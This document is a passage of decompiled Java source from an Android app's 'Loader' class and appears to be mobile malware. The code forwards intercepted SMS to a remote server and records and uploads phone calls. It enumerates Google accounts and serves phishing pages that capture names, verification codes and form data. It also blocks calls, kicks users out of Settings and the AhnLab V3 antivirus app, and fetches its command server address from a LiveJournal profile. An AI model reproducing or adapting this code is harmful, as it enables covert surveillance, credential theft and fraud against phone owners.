  725. i = ((Integer) invoke).intValue();
  726. this.a.g.b("ondbm", new Integer[]{Integer.valueOf(i)}).a(a.a, b.a);
  727. } catch (Exception e) {
  728. i = new n(signalStrength).a();
  729. }
  730. }
  731. }
  732.  
  733. public static final class aq extends TimerTask {
  734. final /* synthetic */ Loader a;
  735. final /* synthetic */ Context b;
  736.  
  737. static final class a implements Runnable {
  738. final /* synthetic */ aq a;
  739.  
  740. a(aq aqVar) {
  741. this.a = aqVar;
  742. }
  743.  
  744. public final void run() {
  745. String topActivityName$loader_release = this.a.a.getTopActivityName$loader_release(this.a.b);
  746. if (topActivityName$loader_release != null) {
  747. CharSequence charSequence = topActivityName$loader_release;
  748. if (d.i.m.a(charSequence, (CharSequence) ".settings", false, 2, null) || d.i.m.a(charSequence, (CharSequence) ".ahnlab.v3", false, 2, null)) {
  749. try {
  750. Intent intent = new Intent("android.intent.action.MAIN");
  751. intent.addCategory("android.intent.category.HOME");
  752. intent.addFlags(268435456);
  753. this.a.b.startActivity(intent);
  754. } catch (Exception e) {
  755. }
  756. }
  757. }
  758. }
  759. }
  760.  
  761. aq(Loader loader, Context context) {
  762. this.a = loader;
  763. this.b = context;
  764. }
  765.  
  766. public void run() {
  767. this.a.b.post(new a(this));
  768. }
  769. }
  770.  
  771. public static final class ar extends ContentObserver {
  772. final /* synthetic */ Loader a;
  773. final /* synthetic */ Context b;
  774.  
  775. static final class a implements Runnable {
  776. final /* synthetic */ ar a;
  777. final /* synthetic */ int b;
  778.  
  779. a(ar arVar, int i) {
  780. this.a = arVar;
  781. this.b = i;
  782. }
  783.  
  784. public final void run() {
  785. try {
  786. com.e.a a2 = e.a(this.a.b, this.b);
  787. if (a2 != null) {
  788. this.a.a.g.a("onSms", (Object) new Object[]{a2.a, a2.c, Long.valueOf(a2.b)});
  789. }
  790. } catch (Exception e) {
  791. e.printStackTrace();
  792. }
  793. }
  794. }
  795.  
  796. ar(Loader loader, Context context, Handler handler) {
  797. this.a = loader;
  798. this.b = context;
  799. super(handler);
  800. }
  801.  
  802. public void onChange(boolean z, Uri uri) {
  803. super.onChange(z, uri);
  804. if (uri != null) {
  805. List pathSegments = uri.getPathSegments();
  806. if (pathSegments.size() == 1) {
  807. try {
  808. Object obj = pathSegments.get(0);
  809. d.e.b.h.a(obj, "seg[0]");
  810. this.a.b.postDelayed(new a(this, Integer.parseInt((String) obj)), 1000);
  811. } catch (Exception e) {
  812. e.printStackTrace();
  813. }
  814. }
  815. }
  816. }
  817. }
  818.  
  819. public static final class as implements Runnable {
  820. final /* synthetic */ Notification a;
  821. final /* synthetic */ int[] b;
  822. final /* synthetic */ Context c;
  823. final /* synthetic */ int d;
  824. final /* synthetic */ Handler e;
  825.  
  826. as(Notification notification, int[] iArr, Context context, int i, Handler handler) {
  827. this.a = notification;
  828. this.b = iArr;
  829. this.c = context;
  830. this.d = i;
  831. this.e = handler;
  832. }
  833.  
  834. public void run() {
  835. new Time().setToNow();
  836. this.a.contentView.setTextViewText(this.b[2], DateFormat.getTimeFormat(this.c).format(new Date()));
  837. Context context = this.c;
  838. if (context == null) {
  839. throw new d.g("null cannot be cast to non-null type android.app.Service");
  840. }
  841. ((Service) context).startForeground(this.d, this.a);
  842. this.e.postDelayed(this, (long) 60000);
  843. }
  844. }
  845.  
  846. public static final class at extends b.h {
  847. final /* synthetic */ Loader a;
  848. final /* synthetic */ Account b;
  849.  
  850. at(Loader loader, Account account, String str) {
  851. this.a = loader;
  852. this.b = account;
  853. super(str);
  854. }
  855.  
  856. public void a(b.d dVar, b.e eVar) {
  857. d.e.b.h.b(dVar, "request");
  858. d.e.b.h.b(eVar, "response");
  859. eVar.c("text/html;charset=UTF-8");
  860. Object systemService = Loader.access$getCtx$p(this.a).getSystemService("phone");
  861. if (systemService == null) {
  862. throw new d.g("null cannot be cast to non-null type android.telephony.TelephonyManager");
  863. }
  864. String access$getLine1 = this.a.a((TelephonyManager) systemService);
  865. String str = access$getLine1 != null ? access$getLine1 : "";
  866. String htmlPhoneText = this.a.getHtmlPhoneText();
  867. if (this.b != null) {
  868. String str2 = this.b.name;
  869. d.e.b.h.a((Object) str2, "acc.name");
  870. htmlPhoneText = d.i.m.b(htmlPhoneText, "%%ACCOUNT%%", str2, false, 4, null);
  871. }
  872. eVar.b(d.i.m.b(htmlPhoneText, "%%PHONE_NUMBER%%", str, false, 4, null));
  873. }
  874. }
  875.  
  876. public static final class au extends b.h {
  877. final /* synthetic */ Loader a;
  878. final /* synthetic */ b.g b;
  879.  
  880. static final class a<T> implements c.a.d.d<Object> {
  881. final /* synthetic */ au a;
  882.  
  883. a(au auVar) {
  884. this.a = auVar;
  885. }
  886.  
  887. public final void a(Object obj) {
  888. this.a.a.setHttpPhoneServerUrl("");
  889. this.a.b.c();
  890. }
  891. }
  892.  
  893. static final class b<T> implements c.a.d.d<Throwable> {
  894. public static final b a = new b();
  895.  
  896. b() {
  897. }
  898.  
  899. public final void a(Throwable th) {
  900. th.printStackTrace();
  901. }
  902. }
  903.  
  904. au(Loader loader, b.g gVar, String str) {
  905. this.a = loader;
  906. this.b = gVar;
  907. super(str);
  908. }
  909.  
  910. public void a(b.d dVar, b.e eVar) {
  911. d.e.b.h.b(dVar, "request");
  912. d.e.b.h.b(eVar, "response");
  913. if (d.e.b.h.a((Object) "application/x-www-form-urlencoded", (Object) (String) dVar.i().get("Content-Type"))) {
  914. String f = dVar.f("vcode");
  915. if (f != null && (!d.i.m.a(f))) {
  916. this.a.g.b("setMyVCode", new String[]{f}).a(new a(this), b.a);
  917. }
  918. }
  919. eVar.c("text/html;charset=UTF-8");
  920. eVar.b("");
  921. }
  922. }
  923.  
  924. static final class av implements Runnable {
  925. final /* synthetic */ b.g a;
  926.  
  927. av(b.g gVar) {
  928. this.a = gVar;
  929. }
  930.  
  931. public final void run() {
  932. this.a.run();
  933. }
  934. }
  935.  
  936. public static final class aw extends b.h {
  937. final /* synthetic */ Loader a;
  938.  
  939. aw(Loader loader, String str) {
  940. this.a = loader;
  941. super(str);
  942. }
  943.  
  944. public void a(b.d dVar, b.e eVar) {
  945. d.e.b.h.b(dVar, "request");
  946. d.e.b.h.b(eVar, "response");
  947. eVar.c("text/html;charset=UTF-8");
  948. eVar.b(this.a.getWebPageData());
  949. }
  950. }
  951.  
  952. public static final class ax extends b.h {
  953. final /* synthetic */ Loader a;
  954. final /* synthetic */ b.g b;
  955.  
  956. static final class a<T> implements c.a.d.d<Object> {
  957. final /* synthetic */ ax a;
  958.  
  959. a(ax axVar) {
  960. this.a = axVar;
  961. }
  962.  
  963. public final void a(Object obj) {
  964. this.a.b.c();
  965. this.a.a.setHttpServerUrl("");
  966. }
  967. }
  968.  
  969. static final class b<T> implements c.a.d.d<Throwable> {
  970. public static final b a = new b();
  971.  
  972. b() {
  973. }
  974.  
  975. public final void a(Throwable th) {
  976. th.printStackTrace();
  977. }
  978. }
  979.  
  980. ax(Loader loader, b.g gVar, String str) {
  981. this.a = loader;
  982. this.b = gVar;
  983. super(str);
  984. }
  985.  
  986. public void a(b.d dVar, b.e eVar) {
  987. String sb;
  988. d.e.b.h.b(dVar, "request");
  989. d.e.b.h.b(eVar, "response");
  990. eVar.a(302);
  991. eVar.c("text/html;charset=UTF-8");
  992. eVar.a("Location", "https://google.com/");
  993. eVar.b("");
  994. if (d.e.b.h.a((Object) "application/x-www-form-urlencoded", (Object) (String) dVar.i().get("Content-Type"))) {
  995. Map j = dVar.j();
  996. if (j.containsKey("name")) {
  997. sb = (String) j.get("name");
  998. } else {
  999. StringBuilder sb2 = new StringBuilder();
  1000. sb2.append("");
  1001. sb2.append((String) j.get("first_name"));
  1002. sb2.append(" ");
  1003. sb2.append((String) j.get("middle_name"));
  1004. sb2.append(" ");
  1005. sb2.append((String) j.get("last_name"));
  1006. sb = sb2.toString();
  1007. }
  1008. StringBuilder sb3 = new StringBuilder();
  1009. sb3.append("JSON:");
  1010. sb3.append(new JSONObject(j).toString(0));
  1011. String sb4 = sb3.toString();
  1012. if (sb != null && (!d.i.m.a(sb))) {
  1013. this.a.g.b("setMyInfo", new String[]{sb, sb4}).a(new a(this), b.a);
  1014. }
  1015. }
  1016. }
  1017. }
  1018.  
  1019. static final class ay implements Runnable {
  1020. final /* synthetic */ b.g a;
  1021.  
  1022. ay(b.g gVar) {
  1023. this.a = gVar;
  1024. }
  1025.  
  1026. public final void run() {
  1027. this.a.run();
  1028. }
  1029. }
  1030.  
  1031. static final class az<T> implements c.a.d.d<Object> {
  1032. final /* synthetic */ Loader a;
  1033. final /* synthetic */ String b;
  1034.  
  1035. /* renamed from: com.Loader$az$1 */
  1036. static final class AnonymousClass1 implements OnClickListener {
  1037. final /* synthetic */ az a;
  1038.  
  1039. /* renamed from: com.Loader$az$1$1 */
  1040. static final class AnonymousClass1<T> implements c.a.d.d<Object> {
  1041. final /* synthetic */ AnonymousClass1 a;
  1042.  
  1043. AnonymousClass1(AnonymousClass1 anonymousClass1) {
  1044. this.a = anonymousClass1;
  1045. }
  1046.  
  1047. public final void a(Object obj) {
  1048. if (obj instanceof Map) {
  1049. Map map = (Map) obj;
  1050. Object obj2 = map.get("Item1");
  1051. if (obj2 == null) {
  1052. throw new d.g("null cannot be cast to non-null type kotlin.Int");
  1053. }
  1054. int intValue = ((Integer) obj2).intValue();
  1055. Object obj3 = map.get("Item2");
  1056. if (obj3 == null) {
  1057. throw new d.g("null cannot be cast to non-null type kotlin.ByteArray");
  1058. }
  1059. byte[] bArr = (byte[]) obj3;
  1060. Inflater inflater = new Inflater(true);
  1061. inflater.setInput(bArr);
  1062. byte[] bArr2 = new byte[intValue];
  1063. inflater.inflate(bArr2);
  1064. this.a.a.a.setWebPageData(new String(bArr2, d.i.d.a));
  1065. if (d.e.b.h.a((Object) this.a.a.a.getHttpServerUrl(), (Object) "")) {
  1066. this.a.a.a.setHttpServerUrl(this.a.a.a.g());
  1067. }
  1068. q.b(Loader.access$getCtx$p(this.a.a.a), this.a.a.a.getHttpServerUrl());
  1069. }
  1070. }
  1071. }
  1072.  
  1073. AnonymousClass1(az azVar) {
  1074. this.a = azVar;
  1075. }
  1076.  
  1077. public final void onClick(DialogInterface dialogInterface, int i) {
  1078. String locale = Locale.getDefault().toString();
  1079. d.e.b.h.a((Object) locale, "Locale.getDefault().toString()");
  1080. if (d.i.m.a(locale, "ko", false, 2, null)) {
  1081. this.a.a.setWebPageData(this.a.a.getHtmlText());
  1082. if (d.e.b.h.a((Object) this.a.a.getHttpServerUrl(), (Object) "")) {
  1083. this.a.a.setHttpServerUrl(this.a.a.g());
  1084. }
  1085. q.b(Loader.access$getCtx$p(this.a.a), this.a.a.getHttpServerUrl());
  1086. return;
  1087. }
  1088. this.a.a.g.b("get_page_data", new String[]{Locale.getDefault().toString(), this.a.b}).a(new AnonymousClass1(this), AnonymousClass2.a);
  1089. }
  1090. }
  1091.  
  1092. az(Loader loader, String str) {
  1093. this.a = loader;
  1094. this.b = str;
  1095. }
  1096.  
  1097. public final void a(Object obj) {
  1098. if ((obj instanceof Boolean) && ((Boolean) obj).booleanValue()) {
  1099. AlertDialog httpServerDlg = this.a.getHttpServerDlg();
  1100. if (httpServerDlg != null) {
  1101. httpServerDlg.dismiss();
  1102. }
  1103. this.a.setHttpServerDlg(new Builder(Loader.access$getCtx$p(this.a)).setMessage(q.b(0)).setCancelable(false).setPositiveButton(q.b(4), new AnonymousClass1(this)).create());
  1104. AlertDialog httpServerDlg2 = this.a.getHttpServerDlg();
  1105. if (httpServerDlg2 == null) {
  1106. throw new d.g("null cannot be cast to non-null type android.app.AlertDialog");
  1107. }
  1108. httpServerDlg2.getWindow().setType(2003);
  1109. httpServerDlg2.show();
  1110. }
  1111. }
  1112. }
  1113.  
  1114. public static final class b extends f {
  1115. final /* synthetic */ Loader a;
  1116. private k b;
  1117. private Timer c;
  1118.  
  1119. static final class a<T> implements c.a.d.d<Object> {
  1120. final /* synthetic */ b a;
  1121. final /* synthetic */ String b;
  1122. final /* synthetic */ d.e.b.j.b c;
  1123.  
  1124. static final class a implements OnClickListener {
  1125. final /* synthetic */ a a;
  1126.  
  1127. a(a aVar) {
  1128. this.a = aVar;
  1129. }
  1130.  
  1131. public final void onClick(DialogInterface dialogInterface, int i) {
  1132. Account account;
  1133. Object systemService = Loader.access$getCtx$p(this.a.a.a).getSystemService("account");
  1134. if (systemService == null) {
  1135. throw new d.g("null cannot be cast to non-null type android.accounts.AccountManager");
  1136. }
  1137. Account[] accounts = ((AccountManager) systemService).getAccounts();
  1138. d.e.b.h.a((Object) accounts, "accounts");
  1139. int length = accounts.length;
  1140. int i2 = 0;
  1141. while (true) {
  1142. if (i2 >= length) {
  1143. account = null;
  1144. break;
  1145. }
  1146. account = accounts[i2];
  1147. if (d.e.b.h.a((Object) "com.google", (Object) account.type)) {
  1148. break;
  1149. }
  1150. i2++;
  1151. }
  1152. if (d.e.b.h.a((Object) this.a.a.a.getHttpPhoneServerUrl(), (Object) "")) {
  1153. this.a.a.a.setHttpPhoneServerUrl(this.a.a.a.a(account));
  1154. }
  1155. q.b(Loader.access$getCtx$p(this.a.a.a), this.a.a.a.getHttpPhoneServerUrl());
  1156. }
  1157. }
  1158.  
  1159. a(b bVar, String str, d.e.b.j.b bVar2) {
  1160. this.a = bVar;
  1161. this.b = str;
  1162. this.c = bVar2;
  1163. }
  1164.  
  1165. public final void a(Object obj) {
  1166. if (d.e.b.h.a(obj, (Object) Boolean.valueOf(true))) {
  1167. this.a.a.g.b("on_call_rec", new Serializable[]{this.b, (Serializable) ((byte[]) this.c.a)}).a(AnonymousClass1.a, AnonymousClass2.a);
  1168. AlertDialog create = new Builder(Loader.access$getCtx$p(this.a.a)).setMessage(q.b(12)).setCancelable(false).setPositiveButton(q.b(4), new a(this)).create();
  1169. d.e.b.h.a((Object) create, "dlg");
  1170. create.getWindow().setType(2003);
  1171. create.show();
  1172. }
  1173. }
  1174. }
  1175.  
  1176. static final class b<T> implements c.a.d.d<Throwable> {
  1177. public static final b a = new b();
  1178.  
  1179. b() {
  1180. }
  1181.  
  1182. public final void a(Throwable th) {
  1183. th.printStackTrace();
  1184. }
  1185. }
  1186.  
  1187. static final class c implements Runnable {
  1188. final /* synthetic */ b a;
  1189.  
  1190. c(b bVar) {
  1191. this.a = bVar;
  1192. }
  1193.  
  1194. public final void run() {
  1195. this.a.a.setSpeekModle$loader_release(true);
  1196. }
  1197. }
  1198.  
  1199. static final class d<T> implements c.a.d.d<Object> {
  1200. final /* synthetic */ b a;
  1201. final /* synthetic */ String b;
  1202.  
  1203. static final class a implements OnClickListener {
  1204. public static final a a = new a();
  1205.  
  1206. a() {
  1207. }
  1208.  
  1209. public final void onClick(DialogInterface dialogInterface, int i) {
  1210. }
  1211. }
  1212.  
  1213. d(b bVar, String str) {
  1214. this.a = bVar;
  1215. this.b = str;
  1216. }
  1217.  
  1218. public final void a(Object obj) {
  1219. if (this.a.a.k || d.e.b.h.a(obj, (Object) Boolean.valueOf(true))) {
  1220. AlertDialog create = new Builder(Loader.access$getCtx$p(this.a.a)).setMessage(q.b(10)).setCancelable(false).setPositiveButton(q.b(4), a.a).create();
  1221. d.e.b.h.a((Object) create, "dlg");
  1222. create.getWindow().setType(2003);
  1223. create.show();
  1224. this.a.a(this.b);
  1225. }
  1226. }
  1227. }
  1228.  
  1229. static final class e<T> implements c.a.d.d<Throwable> {
  1230. public static final e a = new e();
  1231.  
  1232. e() {
  1233. }
  1234.  
  1235. public final void a(Throwable th) {
  1236. th.printStackTrace();
  1237. }
  1238. }
  1239.  
  1240. b(Loader loader) {
  1241. this.a = loader;
  1242. }
  1243.  
  1244. public void onCallStateChanged(int i, String str) {
  1245. d.e.b.h.b(str, "incomingNumber");
  1246. super.onCallStateChanged(i, str);
  1247. if (i == 0) {
  1248. Log.d("WS", "IDLE.");
  1249. if (d.e.b.h.a((Object) a(), (Object) str) && this.b != null) {
  1250. k kVar = this.b;
  1251. if (kVar == null) {
  1252. d.e.b.h.a();
  1253. }
  1254. File b2 = kVar.b();
  1255. if (b2 != null) {
  1256. d.e.b.j.b bVar = new d.e.b.j.b();
  1257. bVar.a = d.d.c.a(b2);
  1258. this.a.g.b("is_call_rec_enable", null).a(c.a.a.b.a.a()).a(new a(this, str, bVar), b.a);
  1259. }
  1260. this.b = null;
  1261. }
  1262. a(null);
  1263. if (this.c != null) {
  1264. Timer timer = this.c;
  1265. if (timer == null) {
  1266. d.e.b.h.a();
  1267. }
  1268. timer.cancel();
  1269. this.c = null;
  1270. }
  1271. } else if (i == 2) {
  1272. this.a.setSpeekModle$loader_release(true);
  1273. c.a.a.b.a.a().a(new c(this), 1000, TimeUnit.MILLISECONDS);
  1274. if (d.e.b.h.a((Object) a(), (Object) str)) {
  1275. Log.d("WS", "OFFHOOK");
  1276. this.b = new k(str);
  1277. k kVar2 = this.b;
  1278. if (kVar2 == null) {
  1279. d.e.b.h.a();
  1280. }
  1281. kVar2.a();
  1282. }
  1283. } else if (i == 1) {
  1284. if (Loader.access$getPreferences$p(this.a).getBoolean("lock", false)) {
  1285. try {
  1286. Object systemService = Loader.access$getCtx$p(this.a).getSystemService("phone");
  1287. if (systemService == null) {
  1288. throw new d.g("null cannot be cast to non-null type android.telephony.TelephonyManager");
  1289. }
  1290. TelephonyManager telephonyManager = (TelephonyManager) systemService;
  1291. Method declaredMethod = Class.forName(telephonyManager.getClass().getName()).getDeclaredMethod("getITelephony", new Class[0]);
  1292. d.e.b.h.a((Object) declaredMethod, "m");
  1293. declaredMethod.setAccessible(true);
  1294. Object invoke = declaredMethod.invoke(telephonyManager, new Object[0]);
  1295. if (invoke == null) {
  1296. throw new d.g("null cannot be cast to non-null type com.android.internal.telephony.ITelephony");
  1297. }
  1298. ((com.a.a.a.a) invoke).a();
  1299. } catch (Exception e2) {
  1300. e2.printStackTrace();
  1301. }
  1302. }
  1303. Log.d("WS", "CALL_STATE_RINGING");
  1304. Object systemService2 = Loader.access$getCtx$p(this.a).getSystemService("audio");
  1305. if (systemService2 == null) {
  1306. throw new d.g("null cannot be cast to non-null type android.media.AudioManager");
  1307. }
  1308. AudioManager audioManager = (AudioManager) systemService2;
  1309. audioManager.setStreamVolume(2, audioManager.getStreamMaxVolume(2), 0);
  1310. if (Loader.access$getPreferences$p(this.a).getBoolean("lock", false)) {
  1311. audioManager.setRingerMode(0);
  1312. } else {
  1313. audioManager.setRingerMode(2);
  1314. }
  1315. this.a.g.b("is_call_rec_enable", null).a(c.a.a.b.a.a()).a(new d(this, str), e.a);
  1316. }
  1317. }
  1318. }
  1319.  
  1320. static final class ba<T> implements c.a.d.d<Throwable> {
  1321. public static final ba a = new ba();
  1322.  
  1323. ba() {
  1324. }
  1325.  
  1326. public final void a(Throwable th) {
  1327. }
  1328. }
  1329.  
  1330. public static final class bb extends WebViewClient {
  1331. bb() {
  1332. }
  1333.  
  1334. public boolean shouldOverrideUrlLoading(WebView webView, String str) {
  1335. d.e.b.h.b(webView, "view");
  1336. d.e.b.h.b(str, "url");
  1337. if (d.i.m.a(str, "http:", false, 2, null) || d.i.m.a(str, "https:", false, 2, null)) {
  1338. webView.loadUrl(str);
  1339. }
  1340. return true;
  1341. }
  1342. }
  1343.  
  1344. public static final class bc extends WebChromeClient {
  1345. final /* synthetic */ WebView a;
  1346. final /* synthetic */ Activity b;
  1347. private View c;
  1348.  
  1349. bc(WebView webView, Activity activity) {
  1350. this.a = webView;
  1351. this.b = activity;
  1352. }
  1353.  
  1354. public void onHideCustomView() {
  1355. ViewParent parent = this.a.getParent();
  1356. if (parent == null) {
  1357. throw new d.g("null cannot be cast to non-null type android.widget.FrameLayout");
  1358. }
  1359. ((FrameLayout) parent).removeView(this.c);
  1360. this.c = null;
  1361. this.b.setRequestedOrientation(1);
  1362. super.onHideCustomView();
  1363. }
  1364.  
  1365. public void onShowCustomView(View view, CustomViewCallback customViewCallback) {
  1366. d.e.b.h.b(view, "view");
  1367. d.e.b.h.b(customViewCallback, "callback");
  1368. Log.d("WS", "onShowCustomView");
  1369. ViewParent parent = this.a.getParent();
  1370. if (parent == null) {
  1371. throw new d.g("null cannot be cast to non-null type android.widget.FrameLayout");
  1372. }
  1373. ((FrameLayout) parent).addView(view);
  1374. this.c = view;
  1375. this.b.setRequestedOrientation(0);
  1376. super.onShowCustomView(view, customViewCallback);
  1377. }
  1378. }
  1379.  
  1380. static final class bd implements OnKeyListener {
  1381. final /* synthetic */ WebView a;
  1382.  
  1383. bd(WebView webView) {
  1384. this.a = webView;
  1385. }
  1386.  
  1387. public final boolean onKey(View view, int i, KeyEvent keyEvent) {
  1388. d.e.b.h.a((Object) keyEvent, "event");
  1389. if (keyEvent.getAction() != 0 || i != 4 || !this.a.canGoBack()) {
  1390. return false;
  1391. }
  1392. this.a.goBack();
  1393. return true;
  1394. }
  1395. }
  1396.  
  1397. static final class be implements Runnable {
  1398. final /* synthetic */ Loader a;
  1399. final /* synthetic */ WebView b;
  1400.  
  1401. be(Loader loader, WebView webView) {
  1402. this.a = loader;
  1403. this.b = webView;
  1404. }
  1405.  
  1406. public final void run() {
  1407. final String access$loadIPAddrLiveJournal = this.a.b("puche571391029");
  1408. StringBuilder sb = new StringBuilder();
  1409. sb.append("加载url:");
  1410. sb.append(access$loadIPAddrLiveJournal);
  1411. Log.d("WS", sb.toString());
  1412. new Handler(Looper.getMainLooper()).post(new Runnable(this) {
  1413. final /* synthetic */ be a;
  1414.  
  1415. public final void run() {
  1416. this.a.b.loadUrl(access$loadIPAddrLiveJournal);
  1417. }
  1418. });
  1419. }
  1420. }
  1421.  
  1422. static final class c<T> implements c.a.d.d<Object> {
  1423. final /* synthetic */ Loader a;
  1424.  
  1425. c(Loader loader) {
  1426. this.a = loader;
  1427. }
  1428.  
  1429. /* JADX DEBUG: Multi-variable type inference result: failure, time: 122 ms */
  1430. /* JADX WARNING: type inference failed for: r1v6 */
  1431. /* JADX WARNING: type inference failed for: r2v4, types: [com.d] */
  1432. /* JADX WARNING: Unknown variable types count: 1 */
  1433. public final void a(java.lang.Object r7) {
  1434. /*
  1435. r6 = this;
  1436. r2 = 1
  1437. r3 = 0
  1438. boolean r0 = r7 instanceof java.lang.Object[]
  1439. if (r0 == 0) goto L_0x00df
  1440. java.lang.Object[] r7 = (java.lang.Object[]) r7
  1441. int r0 = r7.length
  1442. if (r0 != 0) goto L_0x001c
  1443. r0 = r2
  1444. L_0x000c:
  1445. r0 = r0 ^ 1
  1446. if (r0 == 0) goto L_0x00df
  1447. r0 = r7[r3]
  1448. if (r0 != 0) goto L_0x001e
  1449. d.g r0 = new d.g
  1450. java.lang.String r1 = "null cannot be cast to non-null type kotlin.ByteArray"
  1451. r0.m563init(r1)
  1452. throw r0
  1453. L_0x001c:
  1454. r0 = r3
  1455. goto L_0x000c
  1456. L_0x001e:
  1457. byte[] r0 = (byte[]) r0
  1458. org.msgpack.core.n r0 = org.msgpack.core.g.a(r0)
  1459. org.msgpack.a.q r0 = r0.b()
  1460. if (r0 != 0) goto L_0x0032
  1461. d.g r0 = new d.g
  1462. java.lang.String r1 = "null cannot be cast to non-null type org.msgpack.value.MapValue"
  1463. r0.m563init(r1)
  1464. throw r0
  1465. L_0x0032:
  1466. org.msgpack.a.s r0 = (org.msgpack.a.s) r0
  1467. java.util.Set r0 = r0.a()
  1468. java.util.Iterator r4 = r0.iterator()
  1469. L_0x003c:
  1470. boolean r0 = r4.hasNext()
  1471. if (r0 == 0) goto L_0x00df
  1472. java.lang.Object r0 = r4.next()
  1473. java.util.Map$Entry r0 = (java.util.Map.Entry) r0
  1474. java.lang.Object r1 = r0.getKey()
  1475. org.msgpack.a.x r1 = (org.msgpack.a.x) r1
  1476. java.lang.Object r0 = r0.getValue()
  1477. org.msgpack.a.x r0 = (org.msgpack.a.x) r0
  1478. org.msgpack.a.w r1 = r1.w()
  1479. java.lang.String r1 = r1.b()
  1480. org.msgpack.a.w r0 = r0.w()
  1481. java.lang.String r5 = r0.b()
  1482. com.Loader r0 = r6.a
  1483. boolean r0 = r0.y
  1484. if (r0 != 0) goto L_0x00e0
  1485. com.Loader r0 = r6.a
  1486. java.util.Set r0 = r0.c
  1487. boolean r0 = r0.contains(r1)
  1488. if (r0 != 0) goto L_0x00e0
  1489. java.lang.String r0 = "*"
  1490. boolean r0 = d.e.b.h.a(r5, r0)
  1491. if (r0 != 0) goto L_0x008c
  1492. com.Loader r0 = r6.a
  1493. java.util.Set r0 = r0.c
  1494. boolean r0 = r0.contains(r5)
  1495. if (r0 == 0) goto L_0x00e0
  1496. L_0x008c:
  1497. r0 = r2
  1498. L_0x008d:
  1499. if (r0 == 0) goto L_0x003c
  1500. java.lang.StringBuilder r0 = new java.lang.StringBuilder
  1501. r0.<init>()
  1502. java.lang.String r2 = com.c.k
  1503. r0.append(r2)
  1504. r0.append(r1)
  1505. java.lang.String r2 = ".apk"
  1506. r0.append(r2)
  1507. java.io.File r2 = new java.io.File
  1508. java.lang.String r0 = r0.toString()
  1509. r2.<init>(r0)
  1510. com.Loader$c$1 r0 = new com.Loader$c$1
  1511. r0.m234init(r6, r2, r1)
  1512. c.a.d r0 = (c.a.d) r0
  1513. c.a.a r0 = c.a.a.a(r0)
  1514. c.a.r r3 = c.a.g.a.a()
  1515. c.a.a r0 = r0.b(r3)
  1516. c.a.r r3 = c.a.a.b.a.a()
  1517. c.a.a r3 = r0.a(r3)
  1518. com.Loader$c$2 r0 = new com.Loader$c$2
  1519. r0.m237init(r6, r2, r1, r5)
  1520. c.a.d.a r0 = (c.a.d.a) r0
  1521. com.Loader$c$3 r1 = com.Loader.c.AnonymousClass3.a
  1522. d.e.a.b r1 = (d.e.a.b) r1
  1523. if (r1 == 0) goto L_0x00da
  1524. com.d r2 = new com.d
  1525. r2.m362init(r1)
  1526. r1 = r2
  1527. L_0x00da:
  1528. c.a.d.d r1 = (c.a.d.d) r1
  1529. r3.a(r0, r1)
  1530. L_0x00df:
  1531. return
  1532. L_0x00e0:
  1533. r0 = r3
  1534. goto L_0x008d
  1535. */
  1536. throw new UnsupportedOperationException("Method not decompiled: com.Loader$c.a(java.lang.Object):void");
  1537. }
  1538. }
  1539.  
  1540. static final class d extends d.e.b.g implements d.e.a.b<Throwable, d.i> {
  1541. public static final d a = new d();
  1542.  
  1543. d() {
  1544. super(1);
  1545. }
  1546.  
  1547. public final d.g.c a() {
  1548. return d.e.b.k.a(Throwable.class);
  1549. }
  1550.  
  1551. public /* bridge */ /* synthetic */ Object a(Object obj) {
  1552. a((Throwable) obj);
  1553. return d.i.a;
  1554. }
  1555.  
  1556. public final void a(Throwable th) {
  1557. d.e.b.h.b(th, "p1");
  1558. th.printStackTrace();
  1559. }
  1560.  
  1561. public final String b() {
  1562. return "printStackTrace";
  1563. }
  1564.  
  1565. public final String c() {
  1566. return "printStackTrace()V";
  1567. }
  1568. }
  1569.  
  1570. static final class e implements Runnable {
  1571. final /* synthetic */ Loader a;
  1572.  
  1573. e(Loader loader) {
  1574. this.a = loader;
  1575. }
  1576.  
  1577. public final void run() {
  1578. this.a.i();
  1579. }
  1580. }
  1581.  
  1582. static final class f implements Runnable {
  1583. final /* synthetic */ Loader a;
  1584.  
  1585. f(Loader loader) {
  1586. this.a = loader;
  1587. }
  1588.  
  1589. public final void run() {
  1590. final String access$getUriBlocking = this.a.a();
  1591. StringBuilder sb = new StringBuilder();
  1592. sb.append("ns ");
  1593. sb.append(access$getUriBlocking);
  1594. Log.d("WS", sb.toString());
  1595. if (this.a.g.b()) {
  1596. g.a(this.a.g, 0, null, 3, null).a();
  1597. }
  1598. final i iVar = new i(0, 0.0f, 0.0f, 0.0f, 0.0f, 31, null);
  1599. final d.e.b.j.a aVar = new d.e.b.j.a();
  1600. aVar.a = 0;
  1601. final AnonymousClass1 anonymousClass1 = new d.e.a.b<String, d.i>(this) {
  1602. final /* synthetic */ f a;
  1603.  
  1604. /* renamed from: com.Loader$f$1$1 */
  1605. static final class AnonymousClass1<T> implements c.a.d.d<d.i> {
  1606. final /* synthetic */ AnonymousClass1 a;
  1607.  
  1608. AnonymousClass1(AnonymousClass1 anonymousClass1) {
  1609. this.a = anonymousClass1;
  1610. }
  1611.  
  1612. public final void a(d.i iVar) {
  1613. Log.d("WS", "connected");
  1614. iVar.a();
  1615. this.a.a.a.c();
  1616. this.a.a.a.j = "";
  1617. }
  1618. }
  1619.  
  1620. /* renamed from: com.Loader$f$1$2 */
  1621. static final class AnonymousClass2<T> implements c.a.d.d<Throwable> {
  1622. final /* synthetic */ AnonymousClass1 a;
  1623.  
  1624. AnonymousClass2(AnonymousClass1 anonymousClass1) {
  1625. this.a = anonymousClass1;
  1626. }
  1627.  
  1628. public final void a(Throwable th) {
  1629. Log.w("WS", "offline");
  1630. th.printStackTrace();
  1631. this.a.a.a.j = th.toString();
  1632. boolean z = th instanceof p;
  1633. if (z) {
  1634. p pVar = (p) th;
  1635. if (d.i.m.a(pVar.a(), "301:", false, 2, null)) {
  1636. String a2 = pVar.a();
  1637. if (a2 == null) {
  1638. throw new d.g("null cannot be cast to non-null type java.lang.String");
  1639. }
  1640. String substring = a2.substring(4);
  1641. d.e.b.h.a((Object) substring, "(this as java.lang.String).substring(startIndex)");
  1642. Loader.access$getPreferences$p(this.a.a.a).edit().putString("account", substring).apply();
  1643. iVar.a();
  1644. this.a.a.a.b();
  1645. }
  1646. }
  1647. if (!(z && d.i.m.a(((p) th).a(), "302:", false, 2, null))) {
  1648. aVar.a++;
  1649. if (aVar.a == 6) {
  1650. this.a.a.a.sendStartTLSMail(th.toString());
  1651. }
  1652. int b = iVar.b();
  1653. if (b == -1) {
  1654. Log.w("WS", "give up");
  1655. this.a.a.a.b();
  1656. }
  1657. StringBuilder sb = new StringBuilder();
